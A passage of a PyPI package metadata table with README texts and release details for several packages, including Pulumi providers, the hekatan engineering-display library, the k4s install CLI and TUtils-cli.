"langchain_openai==0.1.20",
"llama_index==0.10.39",
"llama_index.core==0.10.68.post1",
"langchain_experimental==0.0.65",
"tabulate==0.9.0",
"PyMuPDF==1.24.14",
"llama-index-llms-langchain==0.3.0",
"PyHive==0.7.0",
"thrift>=0.12.0",
"cryptography==45.0.4",
"autopep8>=2.3.2",
"requests_ntlm>=1.3.0",
"google-auth-oauthlib==1.2.2",
"google-auth-httplib2==0.2.0",
"google-api-python-client==2.184.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.10.0rc2 | 2026-02-20T06:29:19.297562 | xursparks-1.2.12.post3.tar.gz | 46,095 | 8e/cd/1c0cc05e1853b168cf7ea50bc05ee70b3f120f5915cfbfa59aff7309545a/xursparks-1.2.12.post3.tar.gz | source | sdist | null | false | 896ecd2e3c4ee2eaf3794d1a359e1fc3 | 95ca3fa3953d08ccfc900988d37065ec8ec5fc1b916f3b0e27d5c3158816eb9e | 8ecd1c0cc05e1853b168cf7ea50bc05ee70b3f120f5915cfbfa59aff7309545a | null | [] | 203 |
2.4 | pulumi-null | 0.1.0a1771568569 | A Pulumi package for creating and managing Null cloud resources. | [](https://github.com/pulumi/pulumi-null/actions)
[](https://www.npmjs.com/package/@pulumi/null)
[](https://pypi.org/project/pulumi_null)
[](https://www.nuget.org/packages/Pulumi.Null)
[](https://pkg.go.dev/github.com/pulumi/pulumi-null/sdk/go)
[](https://github.com/pulumi/pulumi-null/blob/master/LICENSE)
# Null Resource Provider
This provider exists mainly to ease converting Terraform programs to Pulumi.
For standard use in Pulumi programs, please use your programming language's native null value instead.
The Null resource provider for Pulumi lets you use Null resources in your cloud programs.
To use this package, please [install the Pulumi CLI first](https://www.pulumi.com/docs/install/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/null
or `yarn`:
$ yarn add @pulumi/null
### Python
To use from Python, install using `pip`:
$ pip install pulumi_null
### Go
To use from Go, use `go get` to grab the latest version of the library:
$ go get github.com/pulumi/pulumi-null/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Null
<!-- If your provider has configuration, remove this comment and the comment tags below, updating the documentation. -->
<!--
## Configuration
The following Pulumi configuration can be used:
- `null:token` - (Required) The API token to use with Null. When not set, the provider will use the `NULL_TOKEN` environment variable.
-->
<!-- If your provider has reference material available elsewhere, remove this comment and the comment tags below, updating the documentation. -->
<!--
## Reference
For further information, please visit [Null reference documentation](https://example.com/null).
-->
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, category/cloud | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com/",
"Repository, https://github.com/pulumi/pulumi-null"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:29:06.538954 | pulumi_null-0.1.0a1771568569.tar.gz | 10,677 | 6c/c8/e0749427ad3e9f9897f927a3cb4fecb74bc0020cd25ae8416d5b4e0d677a/pulumi_null-0.1.0a1771568569.tar.gz | source | sdist | null | false | 982fe78569afdba9ee99785bdf286190 | 1f361ce691f198bd56a7edea4764a2820841a5422435ca462ab3598fec192a10 | 6cc8e0749427ad3e9f9897f927a3cb4fecb74bc0020cd25ae8416d5b4e0d677a | null | [] | 189 |
2.4 | TUtils-cli | 0.1.1a1 | TUtils command-line utility toolkit | # TUtils
Most of my work involves using the command line, and sometimes it's simply faster than launching new software. I love Python because countless talented developers have created powerful packages that let me accomplish all sorts of tasks with it. I want to build a command-line tool that lets me get things done without worrying about the underlying code. I'm still actively developing it.
See [doc](./docs/index.md) for more details.
## How to Use
You can install TUtils using pip:
```
pip install tutils-cli
```
After installation, you can use the `tutils` command followed by the desired subcommand to perform various tasks. For example:
```
tutils subcommand [options]
```
For detailed usage instructions and available subcommands, please refer to the documentation or run:
```
tutils --help
```
## LICENSE
MIT, thanks! | text/markdown | null | Jared3Dev <ruxia.tjy@qq.com> | null | null | null | TUtils, TUtils-cli, cli, command-line | [
"Development Status :: 2 - Pre-Alpha",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
"Natural Language :: Chinese (Simplified)",
"Natural Language :: English",
"Operating System :: Microsoft :: Windows :: Windows 10",
"Operating System :: Microsoft :: Windows :: Windows 11",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: 3.15"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"markdown>=3.4",
"pydantic>=1.10.0",
"pyyaml>=6.0",
"rich",
"typer>=0.23.1"
] | [] | [] | [] | [
"Homepage, https://github.com/ruxia-TJY/TUtils",
"Documentation, https://github.com/ruxia-TJY/TUtils",
"Repository, https://github.com/ruxia-TJY/TUtils.git",
"Issues, https://github.com/ruxia-TJY/TUtils/issues",
"Changelog, https://github.com/ruxia-TJY/TUtils/blob/main/CHANGELOG.md"
] | twine/6.2.0 CPython/3.12.7 | 2026-02-20T06:28:51.029959 | tutils_cli-0.1.1a1.tar.gz | 57,637 | f5/34/f2e677cebcbe3e002f20564699d228372e43b328a323ba2e6c7baf69aefa/tutils_cli-0.1.1a1.tar.gz | source | sdist | null | false | 6a9472238823edfdfa43010c3842d5df | 60adf4d5d4815ae073282cd6e37913f672c0f141a8d4ffa8a881f34296d1680a | f534f2e677cebcbe3e002f20564699d228372e43b328a323ba2e6c7baf69aefa | null | [
"LICENSE"
] | 0 |
2.4 | pulumi-juniper-mist | 0.8.0a1771568035 | A Pulumi package for creating and managing Juniper Mist resources. | # Juniper Mist Resource Provider
The Juniper Mist Resource Provider lets you manage Juniper Mist resources.
## Installation
This package is available for several languages/platforms:
- JavaScript/TypeScript: [`@pulumi/juniper-mist`](https://www.npmjs.com/package/@pulumi/juniper-mist)
- Python: [`pulumi-juniper-mist`](https://pypi.org/project/pulumi-juniper-mist/)
- Go: [`github.com/pulumi/pulumi-junipermist/sdk/go/junipermist`](https://pkg.go.dev/github.com/pulumi/pulumi-junipermist/sdk/go/junipermist)
- .NET: [`Pulumi.JuniperMist`](https://www.nuget.org/packages/Pulumi.JuniperMist)
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/juniper-mist
```
or `yarn`:
```bash
yarn add @pulumi/juniper-mist
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi-juniper-mist
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-junipermist/sdk/go/junipermist
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.JuniperMist
```
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, juniper, mist, category/cloud | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-junipermist"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:27:57.725288 | pulumi_juniper_mist-0.8.0a1771568035.tar.gz | 956,155 | 10/9e/f84bbc6b05ef21bfbab173542056896570d560d26e934569850f602c38e8/pulumi_juniper_mist-0.8.0a1771568035.tar.gz | source | sdist | null | false | 61f2486ef312e5eba1edcbc2a5c6543b | b84fbdb96cc1dca1fb6b8db82d29b2f3faa33170ea9ec66ab2d46f33c7992173 | 109ef84bbc6b05ef21bfbab173542056896570d560d26e934569850f602c38e8 | null | [] | 187 |
2.4 | hekatan | 0.9.0 | Python display library for engineering calculations - matrices, equations, symbolic math with SymPy | # hekatan
> Python display library for engineering calculations — equations, matrices, figures, academic papers.
[](https://pypi.org/project/hekatan/)
[](https://pypi.org/project/hekatan/)
[](LICENSE)
[](https://pypi.org/project/hekatan/)
**hekatan** turns your Python engineering scripts into publication-quality HTML documents — with proper math notation, matrices with brackets, fraction bars, integrals, summations, design checks, and academic paper layouts. Zero dependencies. No LaTeX required.
---
## Installation
```bash
pip install hekatan
```
Requires Python 3.8+. No external dependencies.
## Quick Start
```python
from hekatan import matrix, eq, var, fraction, title, text, check, show
title("Beam Design")
text("Rectangular section properties:")
var("b", 300, "mm", "beam width")
var("h", 500, "mm", "beam height")
eq("A", 300 * 500, "mm^2")
title("Stiffness Matrix", level=2)
K = [[12, 6, -12, 6],
[6, 4, -6, 2],
[-12, -6, 12, -6],
[6, 2, -6, 4]]
matrix(K, "K")
title("Design Check", level=2)
fraction("M_u", "phi * b * d^2", "R_n")
check("sigma", 150, 250, "MPa") # 150 <= 250 -> OK
show() # Opens formatted HTML in your browser
```
## Rich Equations
The `eq_block()` function renders equations with fractions, integrals, summations, and equation numbers — using Hekatan Calc notation:
```python
from hekatan import eq_block, show
# Fractions: (numerator)/(denominator) with recursive nesting
eq_block("k = (E * A)/(L) (1)")
# Integrals with limits
eq_block("∫_{a}^{b} f(x)*dx = F(b) - F(a) (5.5)")
# Summation
eq_block("A = Σ_{i=1}^{N} f_i * Delta*x (5.2)")
# Nested fractions + integrals
eq_block("I = ∫_{0}^{1} (1)/(e^{3x})*dx ≈ 0.3167 (5.13)")
# Partial derivatives as fractions
eq_block("(∂^2M_x)/(∂x^2) + (∂^2M_y)/(∂y^2) + q = 0 (1.1)")
# Multiple equations at once
eq_block(
"sigma = (N)/(A) + (M * y)/(I_z) (2)",
"epsilon = (partial u)/(partial x) (3)",
)
show()
```
### Equation Number Syntax
Equation numbers are placed at the end with **2+ spaces** before the parenthesized number:
```python
eq_block("F = m*a (1)") # Simple: (1)
eq_block("D = (E*h^3)/(12) (1.3)") # Dotted: (1.3)
eq_block("N_x = ∫ sigma_x*dz (1.5a)") # With suffix: (1.5a)
```
### Subscript & Superscript Rules
| Notation | Renders as | Notes |
|----------|-----------|-------|
| `x^2` | x² | Simple superscript (digits only) |
| `x^{2n}` | x²ⁿ | Braced superscript (any content) |
| `N_x` | N with subscript x | Simple subscript (one letter) |
| `N_{xy}` | N with subscript xy | Braced subscript (any content) |
| `∂^2M_x` | ∂²Mₓ | `^` takes digits, `_` takes letter |
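The "`^` takes digits" rule can be pictured with a small regex pass (illustrative only — hekatan's actual parser is more complete and also handles subscripts):

```python
import re

def superscripts(s: str) -> str:
    # Braced form x^{...} consumes any content; bare ^ consumes digits only,
    # so ∂^2M_x superscripts just the "2" and leaves "M_x" alone.
    sup = str.maketrans("0123456789n", "⁰¹²³⁴⁵⁶⁷⁸⁹ⁿ")
    s = re.sub(r"\^\{([^}]*)\}", lambda m: m.group(1).translate(sup), s)
    s = re.sub(r"\^(\d+)", lambda m: m.group(1).translate(sup), s)
    return s

print(superscripts("x^2"))      # x²
print(superscripts("x^{2n}"))   # x²ⁿ
print(superscripts("∂^2M_x"))   # ∂²M_x
```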
## Academic Paper Layout
Create publication-quality documents with paper configuration, headers, footers, author blocks, abstracts, and multi-column layouts:
```python
from hekatan import (
paper, header, footer, author, abstract_block,
title, heading, text, markdown, eq_block, figure,
columns, column, end_columns, table, show, clear,
)
clear()
# Paper config: page size, fonts, accent color
paper(
size="A4",
margin="20mm 18mm 25mm 18mm",
fontsize="10pt",
accent="#F27835",
)
# Header bar
header(left="Journal of Civil Engineering", right="Vol 70, 2018")
# Title and authors
title("Method of Incompatible Modes")
author("Ivo Kozar", "University of Rijeka, Croatia")
# Abstract with keywords
abstract_block(
"This paper presents the method of incompatible modes...",
keywords=["finite elements", "incompatible modes"],
lang="english",
)
# Two-column layout (CSS multi-column flow)
columns(2, css_columns=True)
heading("1. Introduction", 2)
markdown("""
The **finite element method** is based on:
- Weak formulation
- Shape functions
- Assembly procedure
""")
# Rich equations
eq_block("u(x) = N(x) * d + M(x) * alpha (1)")
# SVG figures with captions
figure('<svg width="400" height="200">...</svg>',
caption="Beam element with shape functions",
number="1", width="90%")
end_columns()
show("paper_output.html")
```
## How It Works
Each function works in **3 modes** (auto-detected):
| Mode | When | Behavior |
|------|------|----------|
| **Hekatan** | Inside Hekatan Calc (WPF/CLI) | Emits `@@DSL` commands to stdout |
| **Standalone** | Regular Python script | `show()` generates HTML, opens in browser |
| **Console** | Fallback | ASCII formatted output |
Mode is auto-detected via `HEKATAN_RENDER=1` environment variable. You can force a mode with `set_mode("standalone")`, `set_mode("hekatan")`, or `set_mode("console")`.
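The auto-detection amounts to a simple environment check, roughly like this (a sketch of the idea, not hekatan's actual implementation):

```python
import os

_forced_mode = None  # set_mode() would store an override here

def detect_mode() -> str:
    """Pick a rendering mode; HEKATAN_RENDER=1 means we run embedded."""
    if _forced_mode is not None:
        return _forced_mode
    if os.environ.get("HEKATAN_RENDER") == "1":
        return "hekatan"      # emit @@DSL commands to stdout
    return "standalone"       # default: buffer output, show() opens HTML

os.environ["HEKATAN_RENDER"] = "1"
print(detect_mode())  # hekatan
os.environ.pop("HEKATAN_RENDER")
print(detect_mode())  # standalone
```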
## API Reference
### Core Math
| Function | Description | Example |
|----------|-------------|---------|
| `eq(name, value, unit)` | Equation: name = value | `eq("F", 25.5, "kN")` |
| `var(name, value, unit, desc)` | Variable with description | `var("b", 300, "mm", "width")` |
| `eq_block(*equations)` | Rich equations with fractions/integrals | `eq_block("k = (E*A)/(L) (1)")` |
| `formula(expr, name, unit)` | Math formula display | `formula("A_s * f_y / (0.85 * f_c)")` |
| `fraction(num, den, name)` | Formatted fraction | `fraction("M", "S", "sigma")` |
| `matrix(data, name)` | Matrix with brackets | `matrix([[1,2],[3,4]], "A")` |
| `table(data, header)` | Data table | `table([["x","y"],["1","2"]])` |
### Calculus Operators
| Function | Description | Example |
|----------|-------------|---------|
| `integral(expr, var, lo, hi)` | Integral display | `integral("f(x)", "x", "0", "L")` |
| `double_integral(...)` | Double integral | `double_integral("f", "x", "0", "a", "y", "0", "b")` |
| `derivative(func, var, order)` | Derivative df/dx | `derivative("y", "x")` |
| `partial(func, var, order)` | Partial derivative | `partial("u", "x")` |
| `summation(expr, var, lo, hi)` | Summation operator | `summation("a_i", "i", "1", "n")` |
| `product_op(expr, var, lo, hi)` | Product operator | `product_op("a_i", "i", "1", "n")` |
| `sqrt(expr, name, index)` | Square/nth root | `sqrt("a^2 + b^2", "c")` |
| `limit_op(expr, var, to)` | Limit expression | `limit_op("sin(x)/x", "x", "0")` |
### Paper Layout
| Function | Description | Example |
|----------|-------------|---------|
| `paper(size, margin, ...)` | Page configuration | `paper(size="A4", accent="#F27835")` |
| `header(left, right, ...)` | Page header bar | `header(left="Journal", right="Vol 1")` |
| `footer(left, right)` | Page footer | `footer(left="Page 1")` |
| `author(name, affil, email)` | Author block | `author("Dr. Smith", "MIT")` |
| `abstract_block(text, kw)` | Abstract + keywords | `abstract_block("...", keywords=[...])` |
### Text & Content
| Function | Description | Example |
|----------|-------------|---------|
| `title(text, level)` | Heading (h1-h6) | `title("Results", 2)` |
| `heading(text, level)` | Alias for title() | `heading("Section", 3)` |
| `text(content)` | Paragraph text | `text("The beam is safe.")` |
| `markdown(content)` | Markdown text block | `markdown("**bold** and *italic*")` |
| `figure(content, caption, num)` | Figure with caption | `figure("img.png", "Fig 1", "1")` |
| `image(src, alt, width)` | Simple image | `image("photo.jpg", width="60%")` |
| `check(name, val, limit, unit)` | Design verification | `check("sigma", 150, 250, "MPa")` |
| `note(content, kind)` | Callout/note box | `note("Check cover", "warning")` |
| `code(content, lang)` | Code block | `code("import numpy", "python")` |
### Layout
| Function | Description | Example |
|----------|-------------|---------|
| `columns(n, proportions)` | Start multi-column | `columns(2, "32:68")` |
| `column()` | Next column | `column()` |
| `end_columns()` | End columns | `end_columns()` |
| `hr()` | Horizontal rule | `hr()` |
| `page_break(left, right, ...)` | Page break with running header | `page_break(left="Title", right="15")` |
| `html_raw(content)` | Raw HTML | `html_raw("<div>...</div>")` |
| `eq_num(tag)` | Equation number | `eq_num("1.2")` |
### Control
| Function | Description | Example |
|----------|-------------|---------|
| `show(filename)` | Generate HTML + open browser | `show()` or `show("out.html")` |
| `clear()` | Clear accumulated buffer | `clear()` |
| `set_mode(mode)` | Force rendering mode | `set_mode("console")` |
## Features
- **Zero dependencies** — pure Python, no NumPy/LaTeX/MathJax required
- **Greek letters** — auto-converts `alpha`, `sigma`, `phi`, `Delta`, etc. to symbols
- **Subscripts/superscripts** — `A_s` renders as subscript, `x^2` as superscript
- **Braced notation** — `A_{steel}`, `x^{2n}` for multi-character sub/superscripts
- **Smart superscript** — `^` only consumes digits (`∂^2M` stays correct), use `^{x}` for letters
- **Word-boundary safe** — Greek replacement won't corrupt Spanish/Portuguese words
- **Recursive fractions** — `(a + (b)/(c))/(d)` renders nested fraction bars
- **Integrals** — `∫_{a}^{b}` renders with proper limits above/below
- **Summation** — `Σ_{i=1}^{N}` renders with limits above/below
- **Equation numbers** — `(1.1)`, `(1.5a)`, `(2.3b)` all supported
- **CSS columns** — flex-based (manual breaks) and CSS multi-column (auto-flow) layouts
- **Column proportions** — `columns(2, "32:68")` for asymmetric layouts
- **Page breaks with headers** — running headers on each page
- **Print-ready** — `@page` CSS rules for PDF export via browser print
- **Design checks** — pass/fail verification with color-coded output
## Integration with Hekatan Calc
When used inside a [Hekatan Calc](https://github.com/nickkuijpers/Hekatan-Calc-1.0.0) `.hcalc` document:
```
# My Calculation
@{python}
from hekatan import matrix, eq, eq_block
K = [[12, 6], [6, 4]]
matrix(K, "K")
eq("det_K", 12*4 - 6*6)
eq_block("sigma = (M * y)/(I_z) (1)")
@{end python}
```
The output is automatically formatted with Hekatan Calc's CSS — matrices with brackets, equations with proper serif typography, fraction bars, integral symbols, and more.
## Example: FEA Slab Analysis
The `examples/` directory includes a full finite element analysis of a rectangular slab using the BFS plate bending element (585 lines). It demonstrates variables, equations, matrices, tables, partial derivatives, double integrals, and design checks — all rendered as a single HTML document.
```bash
cd examples
python rectangular_slab_fea.py
```
## License
[MIT](LICENSE)
| text/markdown | null | Giorgio Burbanelli <giorgioburbanelli89@gmail.com> | null | null | null | engineering, calculations, matrix, equations, display, hekatan | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Education",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"sympy>=1.12; extra == \"sympy\"",
"ipython>=7.0; extra == \"jupyter\"",
"jupyter; extra == \"jupyter\"",
"sympy>=1.12; extra == \"all\"",
"ipython>=7.0; extra == \"all\"",
"jupyter; extra == \"all\""
] | [] | [] | [] | [
"Homepage, https://github.com/GiorgioBurbanelli89/pyhekatan",
"Repository, https://github.com/GiorgioBurbanelli89/pyhekatan",
"Issues, https://github.com/GiorgioBurbanelli89/pyhekatan/issues"
] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T06:27:33.637471 | hekatan-0.9.0.tar.gz | 51,863 | 65/c2/628e0fc680e084448b5a2a8ef77336b24157599236ef38b8038eadf65002/hekatan-0.9.0.tar.gz | source | sdist | null | false | a48a9adaf36338fe390fa5a1ed4efc00 | 64f210e3c2724963d68385af25ea9d0a3659d1e7ef9f0acf0d0117ccbd4c8ed8 | 65c2628e0fc680e084448b5a2a8ef77336b24157599236ef38b8038eadf65002 | MIT | [
"LICENSE"
] | 229 |
2.4 | pulumi-ns1 | 3.9.0a1771568506 | A Pulumi package for creating and managing ns1 cloud resources. | [](https://github.com/pulumi/pulumi-ns1/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/ns1)
[](https://pypi.org/project/pulumi-ns1)
[](https://badge.fury.io/nu/pulumi.ns1)
[](https://pkg.go.dev/github.com/pulumi/pulumi-ns1/sdk/v3/go)
[](https://github.com/pulumi/pulumi-ns1/blob/master/LICENSE)
# NS1 Resource Provider
The NS1 resource provider for Pulumi lets you manage NS1
resources in your cloud programs. To use this package, please [install the
Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/ns1
or `yarn`:
$ yarn add @pulumi/ns1
### Python
To use from Python, install using `pip`:
$ pip install pulumi_ns1
### Go
To use from Go, use `go get` to grab the latest version of the library:
$ go get github.com/pulumi/pulumi-ns1/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Ns1
## Configuration
The following configuration points are available:
* ns1:apikey - (Required) NS1 API token. It must be provided, but it can also be sourced from the `NS1_APIKEY`
environment variable.
* ns1:endpoint - (Optional) NS1 API endpoint. For managed clients, this normally should not be set. Can also be sourced
via the `NS1_ENDPOINT` environment variable.
* ns1:enableDdi - (Optional) This sets the permission schema to a DDI-compatible schema. Users of the managed SaaS
product should not need to set this. Users of DDI should set this to true if managing teams, users, or API
keys through this provider.
* ns1:rateLimitParallelism - (Optional) Integer for parallelism amount (default is `10`). NS1 uses a token-based method
for rate limiting API requests.
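For instance, the required API key can be stored encrypted in the stack configuration or supplied through the environment (the token value below is a placeholder):

```bash
# Prompt for the token and store it encrypted in the stack config
pulumi config set ns1:apikey --secret

# Alternatively, expose it to the provider via the environment
export NS1_APIKEY="<your-ns1-api-token>"
```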
## Reference
For further information, please visit [the NS1 provider docs](https://www.pulumi.com/docs/intro/cloud-providers/ns1)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/ns1).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, ns1 | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-ns1"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:27:27.466101 | pulumi_ns1-3.9.0a1771568506.tar.gz | 77,255 | da/a4/b3f54c22ad2bbfe73e682c1b0ef4ca68e42d7516dcc0539a6bb7d5c55c21/pulumi_ns1-3.9.0a1771568506.tar.gz | source | sdist | null | false | ddd18127227b57baa25a46b5e4032e70 | 917af049395038cf873142bb8eaa52935eee986c1211b2e3fe15b705fea30793 | daa4b3f54c22ad2bbfe73e682c1b0ef4ca68e42d7516dcc0539a6bb7d5c55c21 | null | [] | 195 |
2.4 | k4s | 0.0.1a4 | A CLI tool for managing installations and Kubernetes operations | # k4s
A CLI tool for managing installations and Kubernetes operations.
It helps install and operate:
- **VM-based products** over SSH (systemd services, OS packages, file layout)
- **Kubernetes-based products** via Helm (with safer targeting via k8s contexts)
## Installation
Recommended (isolated install):
```bash
pipx install k4s
```
Alternative:
```bash
pip install --upgrade k4s
```
## Quick start
Initialize local state:
```bash
k4s init
```
Add a **VM** context (SSH target) and set it as current:
```bash
k4s context add prod-vm --type vm --host 10.0.0.10 --username root --password '...'
k4s context use-context prod-vm
k4s context ping
```
Add a **K8s** context and set it as current:
```bash
k4s context add demo-k8s --type k8s --kubeconfig ~/.kube/config --kubectl-context gke_demo --namespace sep
k4s context use-context demo-k8s
k4s context ping
```
## Core concepts
### Contexts (targets)
`k4s` always operates against a **context**:
- **VM contexts**: SSH connection info (host, username, auth)
- **K8s contexts**: kubeconfig + kubectl context + (optional) default namespace
If `--context` is omitted, `k4s` uses the **current context** (set via `k4s context use-context`).
### Verbosity
- **`-q/--quiet`**: only final results and errors (also suppresses update notices)
- **default**: concise step output
- **`-v`**: show step logs
- **`-vv`**: debug output
### Dry run
Most commands support `--dry-run` to print the plan without applying changes.
## Products and commands
### VM products (SSH)
- **Docker Engine**: `k4s install docker`
- **Nexus**: `k4s install nexus`
- **Dataiku**: `k4s install dataiku`
- **R integration (for an existing Dataiku install)**: `k4s install r`
Health checks (works even if the product was not installed by k4s):
```bash
k4s status nexus
k4s status dataiku --context prod-vm
```
### TLS
```bash
k4s tls enable nexus --issuer self-signed --domain nexus.example.com
k4s tls enable dataiku --issuer acme --domain dss.example.com --email admin@example.com
```
### Kubernetes products (Helm)
- **ingress-nginx**: `k4s install ingress-nginx`
- **Starburst Enterprise**: `k4s install starburst`
- **Starburst components**: `k4s install hive|ranger|cache`
- **Datafloem**: `k4s install datafloem`
Upgrades:
```bash
k4s upgrade starburst --force
k4s upgrade datafloem
```
Example Helm values files:
- See `examples/helm-values/`
## Kubernetes clusters (RKE2)
Create an RKE2 cluster using **VM node contexts**:
```bash
k4s cluster preflight --control-plane cp1 --worker w1
k4s cluster create --name lab --type rke2 --control-plane cp1 --worker w1 --cni canal
k4s cluster kubeconfig --name lab --control-plane cp1
```
## Updates
When installed from PyPI, `k4s` checks once per day for a newer version and prints a notice:
```text
Update available: 0.0.1a1 → 0.0.2 (run: pip install --upgrade k4s)
```
## Development
```bash
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
pip install -e .
pytest
```
## Security notes
- Do **not** commit license files, JWT secrets, or registry credentials.
- Prefer environment variables for credentials when supported by the command.
| text/markdown | Ali Aktaş | null | null | null | Proprietary | null | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: System :: Installation/Setup"
] | [] | https://github.com/aliakts/k4s | null | >=3.9 | [] | [] | [] | [
"click",
"PyYAML",
"requests",
"tqdm",
"paramiko",
"rich",
"cryptography",
"packaging"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.0 | 2026-02-20T06:27:03.018174 | k4s-0.0.1a4.tar.gz | 86,405 | 06/92/7a7d079c59fbe2de8c9efc9e09f35264ea28962906ac9c8bf712688cc136/k4s-0.0.1a4.tar.gz | source | sdist | null | false | fb890083b9823ed6b9ad64360c83e724 | 64b9013375332f5795e7f3c05dc94f2b9b570355c060bd9f14cf47cf4fc6a531 | 06927a7d079c59fbe2de8c9efc9e09f35264ea28962906ac9c8bf712688cc136 | null | [] | 201 |
2.4 | pulumi-mysql | 3.3.0a1771568386 | A Pulumi package for creating and managing mysql cloud resources. | [](https://github.com/pulumi/pulumi-mysql/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/mysql)
[](https://pypi.org/project/pulumi-mysql)
[](https://badge.fury.io/nu/pulumi.mysql)
[](https://pkg.go.dev/github.com/pulumi/pulumi-mysql/sdk/v3/go)
[](https://github.com/pulumi/pulumi-mysql/blob/master/LICENSE)
# MySQL Resource Provider
The MySQL resource provider for Pulumi lets you manage MySQL resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/mysql
or `yarn`:
$ yarn add @pulumi/mysql
### Python
To use from Python, install using `pip`:
$ pip install pulumi_mysql
### Go
To use from Go, use `go get` to grab the latest version of the library:
$ go get github.com/pulumi/pulumi-mysql/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Mysql
## Configuration
The following configuration points are available:
- `mysql:endpoint` (required) - The address of the MySQL server to use. Most often a "hostname:port" pair, but may also
be an absolute path to a Unix socket when the host OS is Unix-compatible. Can be set via `MYSQL_ENDPOINT` environment variable.
- `mysql:username` (required) - Username to use to authenticate with the server. Can be set via `MYSQL_USERNAME` environment variable.
- `mysql:password` - (optional) Password for the given user, if that user has a password. Can be set via `MYSQL_PASSWORD` environment variable.
- `mysql:tls` - (optional) The TLS configuration. One of false, true, or skip-verify. Defaults to `false`. Can be set via
`MYSQL_TLS_CONFIG` environment variable.
- `mysql:proxy` - (optional) SOCKS proxy URL; can also be sourced from the `ALL_PROXY` or `all_proxy` environment variables.
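As a sketch, these settings can also be supplied through the Pulumi CLI instead of environment variables (the endpoint and credentials below are placeholders):

```shell
# Required settings (placeholder values)
pulumi config set mysql:endpoint "db.example.com:3306"
pulumi config set mysql:username admin
pulumi config set --secret mysql:password hunter2

# Optional settings
pulumi config set mysql:tls skip-verify
```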
## Reference
For further information, please visit [the MySQL provider docs](https://www.pulumi.com/docs/intro/cloud-providers/mysql) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/mysql).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, mysql | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.0.0a1",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-mysql"
